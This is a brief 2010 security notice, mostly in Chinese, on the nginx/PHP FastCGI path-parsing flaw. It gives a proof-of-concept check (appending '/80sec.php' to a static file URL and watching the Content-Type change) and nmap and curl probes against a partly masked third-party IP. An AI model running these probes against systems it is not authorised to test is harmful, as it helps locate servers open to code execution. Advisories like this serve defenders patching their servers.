Please Check your server.
<a href="http://www.80sec.com/nginx-securit.html">http://www.80sec.com/nginx-securit.html</a>
<a href="http://www.80sec.com/iis-cgifastcgi-security-hol.html">http://www.80sec.com/iis-cgifastcgi-security-hol.html</a>
Poc:
通路 http://testsite/robots.txt
HTTP/1.1 200 OK Server: nginx/0.6.32 Date: Thu, 20 May 2010 10:05:30 GMT Content-Type: text/plain Content-Length: 18 Last-Modified: Thu, 20 May 2010 06:26:34 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
通路 http://testsite/robots.txt/80sec.php
Date: Thu, 20 May 2010 10:06:49 GMT Content-Type: text/html Transfer-Encoding: chunked X-Powered-By: PHP/5.2.6
其中的Content-Type的變化說明了後端負責解析的變化,該站點就可能存在漏洞。
示範:
pentest@ubuntu:~$ nmap -sV -p 80 218.xx.xx.205
Interesting ports on 218.xx.xx.205:
PORT STATE SERVICE VERSION
80/tcp open http nginx web server 0.8.15
pentest@ubuntu:~$ curl –head http://218.xx.xx.205/images/intro.png -# | grep “Content-Type”
0.0%
Content-Type: image/png
pentest@ubuntu:~$ curl –head http://218.xx.xx.205/images/intro.png/test.php -# | grep “Content-Type”
Reference:
[1]http://hi.baidu.com/yuange1975/blog/item/4c223031a6727eaf5edf0e46.html
[2]http://www.laruence.com/2010/05/20/1495.html